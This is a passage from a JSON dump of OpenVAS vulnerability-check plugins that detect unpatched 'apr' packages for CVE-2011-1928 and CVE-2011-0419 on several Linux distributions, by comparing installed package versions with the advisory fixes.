useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-June/017607.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880490\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0844\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"apr on CentOS 4\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n\n Note: This problem affected httpd configurations using the 'Location'\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation. It did not specifically require a\n malicious HTTP request.\n\n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-May/017593.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881265\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:13:40 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0844\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos5 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"apr on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n\n Note: This problem affected httpd configurations using the 'Location'\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation. It did not specifically require a\n malicious HTTP request.\n\n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2011-7340", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863121", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2011-7340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061183.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863121\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-7340\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Fedora Update for apr FEDORA-2011-7340\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"apr on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.5~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:40:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880491", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880491", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-May/017594.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880491\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0844\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"apr on CentOS 5\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n\n Note: This problem affected httpd configurations using the 'Location'\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation. It did not specifically require a\n malicious HTTP request.\n\n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "RedHat Update for apr RHSA-2011:0844-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870435", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870435", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apr RHSA-2011:0844-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-May/msg00035.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870435\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"RHSA\", value:\"2011:0844-01\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_name(\"RedHat Update for apr RHSA-2011:0844-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(5|4)\");\n script_tag(name:\"affected\", value:\"apr on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n\n Note: This problem affected httpd configurations using the 'Location'\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation. It did not specifically require a\n malicious HTTP request.\n\n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~0.9.4~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-03T00:00:00", "type": "openvas", "title": "Mandriva Update for apr MDVSA-2011:095-1 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831409", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apr MDVSA-2011:095-1 (apr)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-05/msg00021.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831409\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2011:095-1\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Mandriva Update for apr MDVSA-2011:095-1 (apr)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_2010\\.0\");\n script_tag(name:\"affected\", value:\"apr on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\");\n script_tag(name:\"insight\", value:\"It was discovered that the fix for CVE-2011-0419 under certain\n conditions could cause a denial-of-service (DoS) attack in APR\n (CVE-2011-1928).\n\n Packages for 2010.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\n\n Update:\n\n Packages for Mandriva Linux 2010.0 were missing with the MDVSA-2011:095\n advisory.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:36", "description": "The remote host is missing an update to apr\nannounced via advisory DSA 2237-2.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2237-2 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231069737", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069737", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2237_2.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2237-2 (apr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69737\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Debian Security Advisory DSA 2237-2 (apr)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202237-2\");\n script_tag(name:\"insight\", value:\"The recent APR update DSA-2237-1 introduced a regression that could\nlead to an endless loop in the apr_fnmatch() function, causing a\ndenial of service. This update fixes this problem (CVE-2011-1928).\n\nFor reference, the description of the original DSA, which fixed\nCVE-2011-0419:\n\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny4.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze2.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.5-1.\n\nFor the unstable distribution (sid), this problem will be fixed in\nversion 1.4.5-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your apr packages and restart the\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to apr\nannounced via advisory DSA 2237-2.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.2.12-5+lenny4\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dbg\", 